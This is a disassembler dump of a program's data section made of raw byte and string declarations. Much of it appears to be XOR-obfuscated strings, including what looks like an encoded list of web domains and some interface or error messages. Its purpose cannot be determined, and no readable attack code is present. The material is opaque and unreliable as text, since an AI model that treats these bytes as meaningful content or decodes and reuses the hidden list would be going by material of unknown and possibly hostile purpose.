aUb db 'ܜ',0
dw 1
db 9Ch ;
db 0C0h, 0, 12h
db 0
db 8Fh, 0DCh, 0E9h
db 0ECh ;
db 0C6h, 0FCh, 0C9h
db 0E6h ;
db 0E3h, 0EAh, 0DFh
db 0FDh ;
db 0E0h, 0FBh, 0EAh
db 0ECh ;
db 0FBh, 0EAh, 0EBh
db 0
db 7, 0, 8Bh
db 0F8h ;
aAseqcc db '',0
db 7,0
aVM db '',0
db 4
db 0
aS? db 'S}=? ',0
db 1
db 0
db 0CBh, 97h, 0
db 4
align 2
aQt_c db 'qT_C)',0
db 1
align 2
dw 89ACh
db 0
db 2, 0, 65h
db 40h ; @
db 6, 0, 1
db 0
db 4Ch, 6Fh, 0
db 1
align 2
dw 0F3D0h
db 0
db 1, 0, 0FAh
db 0D9h ;
align 2
dw 7
aSixxs db 'ቕ',0
db 1, 0, 0BCh
db 9Fh ;
align 2
dw 7
aC773yll db 'C+773yll',0
db 2Bh, 4, 96h
db 0F5h ;
db 0FEh, 0F3h, 0F5h
db 0FEh ;
db 0F3h, 0F8h, 0E6h
db 0E4h ;
db 0F3h, 2 dup(0E5h)
db 0B8h ;
db 0FFh, 0F8h, 0F0h
db 0F9h ;
db 0B5h, 0F1h, 0F9h
db 0FAh ;
db 0F2h, 0E6h, 0F9h
db 0FAh ;
db 0FAh, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0FFh
db 0F8h ;
db 0E2h, 0F1h, 0F9h
db 0FAh ;
db 0F2h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0F5h
db 0F4h ;
db 0E4h, 0B8h, 0E4h
db 0E3h ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E5h, 0F9h
db 0F5h ;
db 0FDh, 0E5h, 0B8h
db 0F7h ;
db 0F5h, 0B5h, 0E5h
db 0E2h ;
db 0F9h, 0E4h, 0FBh
db 0E6h ;
db 0F7h, 0EFh, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0F5h ;
db 0E4h, 0E3h, 0E2h
db 0F9h ;
db 0E6h, 0B8h, 0F8h
db 0E3h ;
db 0B5h, 0F8h, 0F3h
db 0E1h ;
db 0B8h, 0F3h, 0F1h
db 0F1h ;
db 0B8h, 0F5h, 0F9h
db 0FBh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E6h, 0F9h
db 0F8h ;
db 0ECh, 0FFh, 0E5h
db 0F5h ;
db 0F7h, 0FBh, 0E5h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 0E1h, 0F3h, 0FAh
db 0F5h ;
db 0F9h, 0FBh, 0F3h
db 0A5h ;
db 0B8h, 0E5h, 0FBh
db 0FFh
db 0FAh, 0F3h, 0B8h
db 0F5h ;
db 0F9h, 0B8h, 0E3h
db 0FDh ;
db 0B5h, 0F9h, 0FAh
db 0F4h ;
db 0A4h, 0B8h, 0F8h
db 0F7h ;
db 0E2h, 0FFh, 0F9h
db 0F8h ;
db 0F3h, 0E2h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0F4h ;
db 0F4h, 0FFh, 0F8h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0FBh ;
db 0F7h, 0E5h, 0E2h
db 0F3h ;
db 0E4h, 0BBh, 0EEh
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0E6h, 0F9h, 0F8h
db 0ECh ;
db 0FFh, 0E5h, 0F5h
db 0F7h ;
db 0FBh, 0E5h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0BBh ;
db 0F4h, 0F7h, 0F8h
db 0E7h ;
db 0E3h, 0F3h, 0BBh
db 0F5h ;
db 0F7h, 0F8h, 0F7h
db 0F2h ;
db 0F7h, 0B8h, 0F5h
db 0F7h ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E6h, 0F9h
db 0F8h ;
db 0ECh, 0FFh, 0E5h
db 0F5h ;
db 0F7h, 0FBh, 0E5h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0F4h, 0FBh, 0F9h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 0E6h, 0F7h, 0EFh
db 0E6h ;
db 0F7h, 0FAh, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0F3h ;
db 0F4h, 0F7h, 0EFh
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0F9h, 0F0h, 0FBh
db 0F7h ;
db 0F2h, 0E3h, 0E4h
db 0F7h ;
db 0B8h, 0F5h, 0F9h
db 0FBh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0F5h, 0FFh
db 0F4h ;
db 0F5h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0E0h
db 0E2h ;
db 0F4h, 0B8h, 0E4h
db 0E3h ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0F5h, 0E1h
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 0F1h, 0F9h, 0FAh
db 0F2h ;
db 0E6h, 0F9h, 0FAh
db 0FAh ;
db 0B8h, 0F5h, 0F9h
db 0FBh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E6h, 0F9h
db 0F8h ;
db 0ECh, 0FFh, 0E5h
db 0F5h ;
db 0F7h, 0FBh, 0E5h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 2 dup(0FBh), 0F4h
db 0F7h ;
db 0F8h, 0FDh, 0B8h
db 0E4h ;
db 0E3h, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0E3h
db 0F8h ;
db 0FFh, 0F7h, 0E5h
db 0E2h ;
db 0E4h, 0E3h, 0FBh
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0F1h ;
db 0F9h, 0FAh, 0F2h
db 0E6h ;
db 0F9h, 2 dup(0FAh)
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0E6h, 0F9h, 0F8h
db 0ECh ;
db 0FFh, 0E5h, 0F5h
db 0F7h ;
db 0FBh, 0E5h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0E1h ;
db 0F9h, 0E4h, 0FAh
db 0F2h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0B8h, 0F9h, 0E4h
db 0F1h ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0F5h, 0F7h
db 0F8h ;
db 0F2h, 0FFh, 0F2h
db 0F7h ;
db 0E2h, 0F3h, 0E0h
db 0F3h ;
db 0E4h, 0FFh, 0F0h
db 0FFh
db 0F3h, 0E4h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0E6h ;
db 0F9h, 0F8h, 0ECh
db 0FFh
db 0E5h, 0F5h, 0F7h
db 0FBh ;
db 0E5h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0F4h
db 0F7h ;
db 0F8h, 0FDh, 0F9h
db 0F0h ;
db 0FFh, 0F8h, 0F2h
db 0FFh
db 0F7h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0FFh
db 0F5h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0B8h, 0E4h, 0E3h
db 0B5h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0FFh, 0F8h, 0F1h
db 0B8h ;
db 0FEh, 0F7h, 0FAh
db 0FFh
db 0F0h, 0F7h, 0EEh
db 0BBh ;
db 0F9h, 0F8h, 0FAh
db 0FFh
db 0F8h, 0F3h, 0B8h
db 0F5h ;
db 0F9h, 0B8h, 0E3h
db 0FDh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E0h, 0F3h
db 0F8h ;
db 0F2h, 0F9h, 0E4h
db 0E5h ;
db 0F8h, 0F7h, 0FBh
db 0F3h ;
db 0B8h, 0E1h, 0E5h
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0FDh, 0FBh, 0F4h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0F8h ;
db 0F3h, 0E2h, 0FBh
db 0F7h ;
db 0F1h, 0FFh, 0E5h
db 0E2h ;
db 0F3h, 0E4h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0FDh ;
db 0F7h, 0E0h, 0FDh
db 0F7h ;
db 0ECh, 0F5h, 0F3h
db 0F8h ;
db 0E2h, 0F3h, 0E4h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0E0h, 0F3h, 0F8h
db 0F2h ;
db 0F9h, 0E4h, 0E5h
db 0F8h ;
db 0F7h, 0FBh, 0F3h
db 0B8h ;
db 0E1h, 0E5h, 0B5h
db 0FBh ;
db 0EFh, 0F9h, 0F8h
db 0FAh ;
db 0FFh, 0F8h, 0F3h
db 0F7h ;
db 2 dup(0F5h), 0F9h
db 0E3h ;
db 0F8h, 0E2h, 0E5h
db 0A4h ;
db 0B8h, 0F7h, 0F4h
db 0F4h ;
db 0F3h, 0EFh, 0F8h
db 0F7h ;
db 0E2h, 0FFh, 0F9h
db 0F8h ;
db 0F7h, 0FAh, 0B8h
db 0F5h ;
db 0F9h, 0B8h, 0E3h
db 0FDh ;
db 0B5h, 0F9h, 0F8h
db 0FAh ;
db 0FFh, 0F8h, 0F3h
db 0BBh ;
db 0F4h, 0E3h, 0E5h
db 0FFh
db 0F8h, 0F3h, 0E5h
db 0E5h ;
db 0B8h, 2 dup(0FAh)
db 0F9h ;
db 0EFh, 0F2h, 0E5h
db 0E2h ;
db 0E5h, 0F4h, 0B8h
db 0F5h ;
db 0F9h, 0B8h, 0E3h
db 0FDh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0F7h, 0FAh
db 0FAh ;
db 0F7h, 0FEh, 0F7h
db 0F4h ;
db 0F7h, 0F2h, 0F4h
db 0F7h ;
db 0F8h, 0FDh, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0E4h ;
db 0F4h, 0F5h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0E6h ;
db 0F9h, 0F8h, 0ECh
db 0FFh
db 0E5h, 0F5h, 0F7h
db 0FBh ;
db 0E5h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0A7h, 0B8h
db 0FEh ;
db 0E5h, 0F4h, 0F5h
db 0B8h ;
db 0F5h, 0F7h, 0B5h
db 0FDh ;
db 0F1h, 0F4h, 0E4h
db 0F3h ;
db 0FAh, 0F7h, 0EEh
db 0F5h ;
db 0FAh, 0E3h, 0F4h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0EFh ;
db 0F7h, 0FBh, 0F4h
db 0F9h ;
db 0B8h, 0F4h, 0FFh
db 0ECh ;
db 0B5h, 0FDh, 0FFh
db 0F2h ;
db 0F9h, 0E5h, 0BBh
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0FAh ;
db 0F4h, 0F5h, 0F2h
db 0FFh
db 0E4h, 0F3h, 0F5h
db 0E2h ;
db 0B8h, 0FAh, 0F7h
db 0E3h ;
db 0E4h, 0F3h, 0F8h
db 0E2h ;
db 0FFh, 0F7h, 0F8h
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0B8h ;
db 0F5h, 0F7h, 0B5h
db 0F4h ;
db 0F7h, 0E4h, 0F5h
db 0FAh ;
db 0F7h, 0EFh, 0E5h
db 0B8h ;
db 0F5h, 0F9h, 0FBh
db 0B5h ;
db 0E2h, 0F9h, 0E2h
db 0F7h ;
db 2 dup(0FAh), 0EFh
db 0F0h ;
db 0E4h, 2 dup(0F3h)
db 0F4h ;
db 0F7h, 0F8h, 0FDh
db 0FFh
db 0F8h, 0F1h, 0B8h
db 0F5h ;
db 0F9h, 0FBh, 0B5h
db 0E1h ;
db 2 dup(0E1h), 0B8h
db 0F8h ;
db 0F4h, 0F5h, 0B8h
db 0F5h ;
db 0F7h, 0B5h, 0A3h
db 0A5h ;
db 0F4h, 0F7h, 0F8h
db 0FDh ;
db 0B8h, 0F5h, 0F9h
db 0FBh ;
db 0B5h, 2 dup(0E1h)
db 0E1h ;
db 0B8h, 0E0h, 0F3h
db 0F8h ;
db 0F2h, 0F9h, 0E4h
db 0E5h ;
db 0F8h, 0F7h, 0FBh
db 0F3h ;
db 0B8h, 0E1h, 0E5h
db 0B5h ;
db 3 dup(0E1h)
db 0B8h ;
db 0F4h, 0A4h, 0F4h
db 0BBh ;
db 0E2h, 0E4h, 0E3h
db 0E5h ;
db 0E2h, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E1h
db 0E1h ;
db 0E1h, 0B8h, 0E0h
db 0F3h ;
db 0F8h, 0F2h, 0F9h
db 0E4h ;
db 0E5h, 0F8h, 0F7h
db 0FBh ;
db 0F3h, 0B8h, 0E1h
db 0E5h ;
db 0B5h, 0F9h, 0E6h
db 0F3h ;
db 0F8h, 0F4h, 0F7h
db 0F8h ;
db 0FDh, 0B8h, 0F5h
db 0F9h ;
db 0FBh, 0B5h, 0E2h
db 0F7h ;
db 0E2h, 0BBh, 0F8h
db 0F3h ;
db 0F0h, 0E2h, 0F4h
db 0F7h ;
db 0F8h, 0FDh, 0B8h
db 0E4h ;
db 0E3h, 0B5h, 0E5h
db 0F3h ;
db 0F5h, 0FAh, 0F7h
db 0F4h ;
db 0B8h, 0E4h, 0E3h
db 0B5h ;
db 0E5h, 0F3h, 0F5h
db 0E3h ;
db 0E4h, 0FFh, 0E2h
db 0EFh ;
db 0FAh, 0F7h, 0F4h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0F0h ;
db 0F3h, 0E2h, 0FEh
db 0F7h ;
db 0E4h, 0F2h, 0B8h
db 0F4h ;
db 0FFh, 0ECh, 0B5h
db 0F1h ;
db 0E4h, 0F9h, 0F8h
db 0EEh ;
db 0E6h, 0FAh, 0F7h
db 0F8h ;
db 0F3h, 0E2h, 0E5h
db 0B8h ;
db 0E4h, 0E3h, 0B5h
db 0E0h ;
db 0F3h, 0F8h, 0F2h
db 0F9h ;
db 0E4h, 0E5h, 0F8h
db 0F7h ;
db 0FBh, 0F3h, 0B8h
db 0E1h ;
db 0E5h, 0B5h, 0
db 0
db 4, 2 dup(0)
db 0
db 0B2h, 0, 0F0h
db 0
db 0FDh, 0, 0F6h
db 0
db 0EBh, 2 dup(0)
db 0
db 1, 0, 1Eh
db 3Eh ; >
align 4
db 15h
align 2
dw 13h
db 47h ; G
db 12h, 29h, 26h
aG3G235_ db '%+"g3(g&23/(5.="',0
a5 db '5',0
db 0F7h
aVscxitGsCvgqse db '׃זקקה',0
dw 1
db 0A3h ;
db 8Eh, 0, 1Eh
db 0
db 0Ch, 5Ch, 60h
db 69h ; i
db 6Dh, 7Fh, 69h
db 20h
db 2Ch, 7Fh, 69h
aIoxItEMxecbUim db '`iox,It|e~mxecb,Uim~',0
db 1, 0, 30h
db 10h
align 2
dw 1Fh
db 9Ah ;
db 0CAh, 0F6h, 0FFh
db 0FBh ;
db 0E9h, 0FFh, 0B6h
db 0BAh ;
db 0E9h, 0FFh, 0F6h
db 0FFh
db 0F9h, 0EEh, 0BAh
db 0DFh ;
db 0E2h, 0EAh, 0F3h
db 0E8h ;
db 0FBh, 0EEh, 0F3h
db 0F5h ;
db 0F4h, 0BAh, 0D7h
db 0F5h ;
db 0F4h, 0EEh, 0F2h
db 0
db 4, 0, 52h
aWbj db 'wbj',0Ah,0
db 1, 0, 10h
db 4Ch ; L
align 2
dw 1
db 0F8h ;
db 0D2h, 0, 4
db 0
db ')-)))',0
db 9,0
db 60h, 30h, 12h
db 0Fh
db 4, 15h, 3
db 14h
db 29h, 4, 0
db 29h ; )
align 2
aAXzdtbcpuBAZpd db 'Ӏ',0
db 1, 0, 5Bh
db 75h ; u
align 2
dw 4
aEh@K db 'eH@=K',0
dw 3
aLs db '',0
db 8,0
aCC db '',0
db 2, 0, 2Fh
db 61h ; a
db 7Bh, 0, 2
db 0
db 0DEh, 0E7h, 86h
db 0
db 6, 0, 15h
aFagvel db 'fagvel',0
db 8,0
db '',0
db 7,0
db 87h, 0F4h, 0F7h
db 0F5h ;
db 0EEh, 0E9h, 0F3h
db 0E1h ;
align 2
dw 6
db '',0
db 5
align 2
dw 681Bh
db 69h ; i
db 7Ah, 75h, 7Fh
db 0
db 4, 0, 0C0h
aBod db '',0
db 6, 0, 10h
aUCud db '}u}cud',0
db 6
db 0
a4yqywdm db '4YQYWDM',0
db 6, 0, 93h
db 0FEh ;
db 0F6h, 0FEh, 0F0h
db 0FEh ;
db 0E3h, 0, 6
db 0
db 74h, 19h, 15h
db 18h
db 18h, 1Bh, 17h
db 0
db 4, 0, 0CDh
aLIi db '',0
db 4, 0, 0C2h
aGNl db '',0
db 7,0
aXskrxxac db '告',0
db 6
align 2
dw 4B14h
aGxqqd db 'gxqqd',0
db 0Ah,0
db 0Eh
aMZjbbJbb db 'm|zjbb jbb',0
db 0Ah,0
aTbrcjooJoo db '⁐̆',0
dw 6
aKkqVx db ' KKQ',0Dh,'VX',0
db 6
align 2
dw 66Dh
db 6
db 1Ch, 40h, 1Bh
db 15h
align 2
dw 6
aIiU db 'è',0
db 6
align 2
dw 771Ch
aWm1jd db 'wm1jd',0
db 8,0
db 7
db 22h, 74h, 58h
db 6Ah ; j
db 73h, 7Fh, 22h
db 72h ; r
align 2
dw 6
db 0D0h ;
db 2 dup(0BBh), 0A1h
db 0FDh ;
db 0A6h, 0A8h, 0
db 7
align 2
dw 0E9CCh
db 0BFh ;
db 93h, 0A1h, 0B8h
db 0B4h ;
db 0FDh, 0, 16h
db 0
aTbolbiNmbzNBnm db '⡎¶¡',0
db 6, 0, 38h
aZmllwv db 'zmllwv',0
db 1Eh
db 0
db 4, 41h, 5Ch
db 54h ; T
db 4Dh, 56h, 45h
db 50h ; P
db 4Dh, 4Bh, 4Ah
db 24h ; $
db 40h, 45h, 50h
db 41h ; A
db 3 dup(0Eh)
aEpiTmjGk@a db 'EPI$TMJ$GK@A',0
db 6, 0, 0Bh
aX_j_bh db 'X_J_BH',0
align 4
db 0
db '',0
db 4
db 0
aIcl db 'ߚ',0
db 6
db 0
db 0C5h, 0F7h, 0F5h
db 0E0h ;
db 0EBh, 0F7h, 0B0h
db 0
db 4, 0, 85h
db 0A0h ;
db 0ABh, 0B7h, 0F0h
db 0
db 2 dup(0), 0B4h
db 0
db 8, 0, 55h
db 16h
db 1Ah, 18h, 17h
db 1Ah
db 17h, 1Ah, 0Dh
db 0
db 2 dup(0), 8Eh
db 0
db 8, 0, 19h
aZvtVVa db 'ZVT[V[VA',0
db 6, 0, 12h
aAfsfQ db 'AFSF[Q',0
aN db 'n',0
db 43h, 16h, 2Dh
db 22h ; "
db 21h, 2Fh, 26h
db 63h ; c
db 37h, 2Ch, 63h
db 22h ; "
db 36h, 37h, 2Bh
db 2Ch ; ,
db 31h, 2Ah, 39h
db 26h ; &
db 6Dh, 49h, 66h
db 30h ; 0
db 63h, 33h, 31h
db 2Ch ; ,
db 20h, 26h, 30h
db 30h ; 0
db 2Ah, 2Dh, 24h
db 63h ; c
db 20h, 26h, 2Dh
db 37h ; 7
db 26h, 31h, 63h
db 2Ah ; *
db 30h, 63h, 36h
db 2Dh ; -
db 22h, 21h, 2Fh
db 26h ; &
db 63h, 37h, 2Ch
db 63h ; c
db 22h, 36h, 37h
db 2Bh ; +
db 2Ch, 31h, 2Ah
db 39h ; 9
db 26h, 63h, 3Ah
db 2Ch ; ,
db 36h, 31h, 63h
db 20h
db 22h, 31h, 27h
db 63h ; c
db 66h, 30h, 6Dh
db 49h ; I
db 0Eh, 22h, 28h
aC1170cC71CM db '&c ,11& 7*,-0c"-',27h,'c71:c"$"*-m',0
db 0Ah,0
aM db 'M',0
db 2Ch, 3Eh, 39h
db 28h ; (
db 3Fh, 0Eh, 2Ch
db 3Fh ; ?
db 29h, 0, 4
db 0
db 5Dh, 0Bh, 14h
db 0Eh
db 1Ch, 0, 1
db 0
db 42h, 62h, 0
db 6
align 2
aY80 db 'y*-8-0:',0
align 4
aT db '',0
dw 6
aV7?5 db 'v%"7"?5',0
db 15h
align 2
aFlfff6455F db 'flFFF64)%#55/(!F ',27h,'/*#"',0
db 6, 0, 5Eh
db 0Dh
db 0Ah, 1Fh, 0Ah
db 17h
db 1Dh, 0, 6
db 0
aB3o4 db 'B))3o4:',0
db 8,0
aIAgI db '̉',0
db 9,0
db 80h
db 0C4h ;
db 0EFh, 0E3h, 0CFh
db 0E2h ;
db 0EAh, 0E5h, 0E3h
db 0F4h ;
align 2
dw 0Eh
aAGGcZz db 'Ԁ',0
db 4
align 2
dw 0B49Ah
db 0F4h ;
db 0F6h, 0E9h, 0
db 1
align 2
dw 0FBA7h
db 0
db 5, 0, 3
aPP_ db '&p&p_',0
dw 5
db 2Bh ; +
db 0Eh, 58h, 0Eh
db 58h ; X
db 77h, 0, 3
db 0
aUA db '',0
dw 4
aPk db '',0
align 10h
db 0
db 9,0
align 4
db 0
db '',0
aZ db '',0
aA_0 db '',0
aG db '',0
aK db '',0
db '',0
aA_1 db '',0
aA_2 db '',0
db '',0
aB db '',0
db 2 dup(0), 5Fh
db 0
aIu_iTyi_TyiTyi db 'Iu $.i> -=!tyi!, .!=tyi+&;-,;tyi:;*t!==9sffl:v!tl:o tl<l:o&tl<o/t'
db 'l*o: tl:o:&tl<o=%tl<o?tl<o-tl:w',0
db ',',0
aBAAnaAnaAnaAsT db 'ڝՀɀπހΒۀރ',0
db 7,0
aNPnuP db 'ӏӏ',0
db 3, 0, 7Ah
dd 471541h, 7B400004h, 7D2F33h, 0F3C80004h, 0E2F5ACh, 300h
dd 0F004600h, 1000B00h, 10000000h, 0F9E2B100h, 0F7C5D4F6h
dd 0D4D5DDDEh, 0C5D0E1C3h, 0B00F0D9h, 0C4DFAC00h, 9FC0C0C9h
dd 0C0C8829Eh, 0B00C0h, 6B667D0Eh, 3C3D6262h, 62626A20h
dd 2000C00h, 57766745h, 4C706771h, 43676F63h, 0B000B00h
dd 486C6E59h, 6E786467h, 726E40h, 0BDEF0010h, 9ABE888Ah
dd 0B9969D8Ah, 8A9A838Eh, 0AE97AAh, 0C99B000Dh, 0EBD4FCFEh
dd 0FED0F5FEh, 0DAE3DEE2h, 7000C00h, 66716366h, 35346E77h
dd 6B6B6329h, 8E000C00h, 0EFF8EAEFh, 0BCBDE7FEh, 0E2E2EAA0h
dd 97000100h, 500CBh, 331C4A6Fh, 5001C4Ah, 0C5A7F00h, 0C5A23h
dd 0AE8B0004h, 0A1D7F8h, 0D8F60004h, 859A98h, 79250001h
dd 0C001100h
aEbxiBixItCI db 'Ebxi~bix,It|`c~i~',0
align 4
aD db 'D',0
dw 1
dd 2D55h, 0E00E400h, 0DBF9BE00h, 0D1CAEDCAh, 0DCF1D5DDh
dd 0CADDDBD4h, 0B0000B00h, 0D1D5C2F3h, 0DFF6D5C4h, 0F1C4DEh
dd 2A4D0009h, 7F7E2429h, 21212963h, 0D7000900h, 0E4BEB3B0h
dd 0BBB3F9E5h, 0B00BBh, 0FACCF6BFh, 0D3DECACEh, 0FBF6EAF8h
dd 6F000E00h, 13A002Ch, 1B060106h, 6030E06h, 0C000A15h
dd 0D7FBB800h, 0CCD1D6F1h, 0D1D4D9D1h, 1000DDC2h, 98B4F700h
dd 969285B4h, 99BE9283h, 99968384h, 0F009294h, 0F6F9BA00h
dd 0FCFEF3E9h, 0E9D7D5C8h, 0D4D3C8CEh, 900DDh, 40D0E61h
dd 54F5352h, 9000D0Dh, 0B6B5DA00h, 0F4E8E9BFh, 0B6B6BEh
dd 8AA40004h, 0D0C5C0h, 0A2F0017h, 0A4C0A4Ch, 24C0A4Ch
dd 2 dup(4C0A4C0Ah), 4C014C0Ah, 16004240h, 54123700h, 2 dup(54125412h)
dd 1254121Ah, 12541254h, 42451954h, 4C000E00h, 38290Bh
dd 202D2F23h, 2A220529h, 0D000D23h, 0E8CA8D00h, 0FFE8DBF9h
dd 0E3E2E4FEh, 0CCF5C8h, 83C50014h, 91A0A9ACh, 91A0A8ACh
dd 0B6BC96AAh, 91A8A0B1h, 0A0A8ACh, 0E5A6000Fh, 0C7D6CBC9h
dd 0CFE0C3D4h, 0CFF2C3CAh, 1500C3CBh, 11337400h, 181B2200h
dd 3D111901h, 61B121Ah, 1D001519h, 351A1Bh, 327B0014h
dd 91E0F15h, 10181417h, 1E3F1F1Eh, 161E0918h, 0F151Eh
dd 96DF0014h, 0ADBAABB1h, 0B4BCB0B3h, 0B196BBBAh, 0B2BAADBCh
dd 0ABB1BAh, 31760013h, 0F250213h, 1B130205h, 13041F32h
dd 4190215h, 1200370Fh, 0E5C78000h, 0E4EFCDF4h, 0C6E5ECF5h
dd 0CEE5ECE9h, 0C1E5EDE1h, 0E5000A00h, 8B8095AAh, 809190A8h
dd 0C00A49Dh, 0EBDA9900h, 0FCEDF8FCh, 0FCEDECD4h, 900D8E1h
dd 98B4F700h, 9EB18E87h, 0B6929Bh, 185F0011h, 361B2B3Ah
dd 2D19342Ch, 2F0C3A3Ah, 1E3A3C3Eh, 0F2000C00h, 0B78697A1h
dd 809D8080h, 97969DBFh, 0E8001100h, 0AD9C8DAFh, 0AB9C8190h
dd 0BC8D8C87h, 898D9A80h, 0D008Ch, 0BFAE8CCBh, 0BDA2B98Fh
dd 0BBB29FAEh, 9008AAEh, 133C7A00h, 16391E14h, 1F0915h
dd 581E000Dh, 507A7077h, 586A667Bh, 5F7B7277h, 61000E00h
dd 50F0827h, 12130827h, 0D082715h, 0C002004h, 0C9EBAC00h
dd 0CFC5F8D8h, 0D9C3EFC7h, 0D00D8C2h, 0D3F5A700h, 0D5C2FDCBh
dd 0CAC2EAC8h, 0DED5C8h, 4F08000Dh, 715B7C6Dh, 656D7C7Bh
dd 6D65615Ch, 8F000900h, 0EEECE0C3h, 0EAFDC9E3h, 0A00EAh
dd 111D3E72h, 1E331E13h, 111D1Eh, 2076000Bh, 302041Fh
dd 4301A17h, 0C001313h, 0EAD58300h, 0E2F6F7F1h, 0EFEFC2EFh
dd 800E0ECh, 5D6A3800h, 517E5C59h, 0C005D54h, 0A381C600h
dd 0ABA392B2h, 0B2A796B6h, 120087AEh, 0C9C28500h, 0E9E4E7EAh
dd 0EAE8E0C8h, 0F1D6FCF7h, 0F6F0F1E4h, 0E9001300h, 9D859CA4h
dd 9D90AB80h, 0BE86BD8Ch, 0AA8C8D80h, 9B8881h, 0C7900013h
dd 0D3F5F4F9h, 0C4E2F1F8h, 0FCE5DDFFh, 0E9D2F9E4h, 700F5E4h
dd 8BB5E200h, 879AA78Ch, 80081h, 32352A46h, 28232A34h
dd 0B0011h, 3F2E0C4Bh, 2E27220Dh, 2E312218h, 0C8000B00h
dd 0BBA7A48Bh, 0A6A980ADh, 0ADA4ACh, 71260009h, 43524F54h
dd 434A4F60h, 0C0000E00h, 86B4A593h, 90A5ACA9h, 0B4AEA9AFh
dd 0B00B2A5h, 0C3E2A600h, 0C3D2C3CAh, 0C3CACFE0h, 0B00E7h
dd 899EAFECh, 0AA89988Dh, 0AD898085h, 0E7000C00h, 838688ABh
dd 95858EABh, 0A69E9586h, 86001000h, 0CBF2E3C1h, 0EAF3E2E9h
dd 0E8E7CEE3h, 0C7E3EAE2h, 0BB000400h, 0CBDEDEF9h, 98000A00h
dd 0ECF1E0DDh, 0FDEAF0CCh, 1200FCF9h, 78531600h, 73527B63h
dd 79627D65h, 787F4166h, 65617972h, 0E1000D00h, 858F88A7h
dd 858F88B6h, 99A4968Eh, 1000A0h, 37240256h, 373A2538h
dd 331B3322h, 31372525h, 0A0033h, 0F0F7CC9Fh, 0F1F6C8E8h
dd 0E8F0FBh, 0CE9D000Eh, 0F4CAE9F8h, 0EAF2F9F3h, 0E9E5F8C9h
dd 0E00DCh, 16073162h, 60C0B35h, 0D2E150Dh, 23050Ch, 0F3A00008h
dd 0C9F4D4C5h, 0D2C5CDh, 590A0008h, 654C7E6Fh, 797F69h
dd 0EBB8000Ch, 0F5DCD6DDh, 0D9CBCBDDh, 0F9DDDFh, 0BAE8000Eh
dd 9B818F8Dh, 0AB9A8D9Ch, 9B9B8984h, 0A00A9h, 140D2F62h
dd 0C0B3507h, 150D06h, 0D40000Bh, 21333325h, 2F022527h
